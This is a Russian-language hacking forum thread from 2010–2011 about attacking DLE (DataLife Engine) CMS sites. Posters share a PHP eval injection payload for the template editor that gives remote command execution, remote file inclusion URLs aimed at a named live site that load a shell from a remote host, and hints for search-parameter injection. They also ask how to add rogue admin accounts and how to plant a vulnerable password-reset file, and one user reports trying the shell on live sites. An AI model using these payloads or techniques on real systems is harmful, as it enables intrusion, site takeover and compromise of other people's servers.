ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.09.2010, 20:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html
)), пофиксели мой приватный способ заливки шелла
|
|
|
21.09.2010, 15:30
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696
Репутация:
-4
|
|
Там два момента. На мой взгялд они не связаны (с поиском и средактором шаблона). Редактор доступен только из админки, и вот что мне удалось натестить:
Если отправить POST запрос приблизительного следующего содержания:
Код HTML:
HTML:
кнопка сабмит где то тут...
Поигратся с кавычками, то можно затолкать туда php код для исполнения...
С поиском так и не понял, что можно намутить
__________________________________
К моему предедёщему посту дополнение.
В POST запросе нужно отправить:
Код:
Code:
{${@eval($_GET[cmd])}}
после этого любая комманды вида:
site.ru/?cmd= echo%20phpinfo();
ЗЫ комманда д.б. закодирована urlencode();
___________________________________
не стоим на месте:
"глобальные массивы" д.б. ОN, а дальше:
?do=search&subaction=search&story=bla-bla&sql_count=Sql_Que..&titleonly=FOUR |
|
|
|
25.09.2010, 13:43
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737
Репутация:
-5
|
|
Кто скажет что про это, http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html какой то баг видно серьезный нашли
|
|
|
|
25.09.2010, 13:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
1931
Репутация:
0
|
|
oko, а в посте перед тобой о чем расписано ?
slva2000, получается воспользоваться багом с редактором шаблона можно только через админку ?
И можешь чуть поподробней расписать, как использовать баг с поиском?
|
|
|
|
19.10.2010, 11:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
30137
Репутация:
48
|
|
Помогите написать скрипт для ДЛЕ, что бы он добавил нового пользователя в бд с правами админа ...
|
|
|
|
04.11.2010, 13:58
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696
Репутация:
-4
|
|
Раскрытие префикса к БД
версии, вероятно, до 8.0
1. Регаешься
2. Авторизируешься
3. Смотриш куку с именем, вида XXXX_name, которая принимает значение твоего логина,
где XXXX - префикс к БД.
|
|
|
|
20.11.2010, 23:32
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от slva2000
slva2000 said:
Раскрытие префикса к БД
версии, вероятно, до 8.0
1. Регаешься
2. Авторизируешься
3. Смотриш куку с именем, вида
XXXX
_name, которая принимает значение твоего логина,
где XXXX - префикс к БД.
Это не префикс к БД, это просто название куки, она всегда dle_name, есть еще dle_password, dle_pm и dle_user_id. Проверено на dle7.0, dle7.3 и dle 7.5
|
|
|
|
03.02.2011, 03:58
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124
Репутация:
65
|
|
Выкладываю несколько сплоитов для DLE 8.3
ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca
lhost/c.txt?
http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt
?
http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L]
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
|
|
|
|
05.02.2011, 01:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
18455
Репутация:
0
|
|
Сообщение от None
Выкладываю несколько сплоитов для DLE 8.3
ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca
lhost/c.txt?
http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt
?
http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L]
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local
host/c.txt?
Чет не врубился как юзать, подробнее можете расписать?
Я так понимаю заливаем шелл.
Залил я шелл допустим на народ, нашел парочку сайтов на дле данной версии и пробую... на некоторых просто белая страница, на других вылазиет какая то ошибка.
|
|
|
|
07.02.2011, 01:17
|
|
Новичок
Регистрация: 25.08.2009
Сообщений: 0
Провел на форуме:
15030
Репутация:
0
|
|
ребят, у кого осталась уязвимая версия lostpassword.php для 8,2 или кто может сделать такую же темку для 8,3?) надо прикрутить на сайт)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
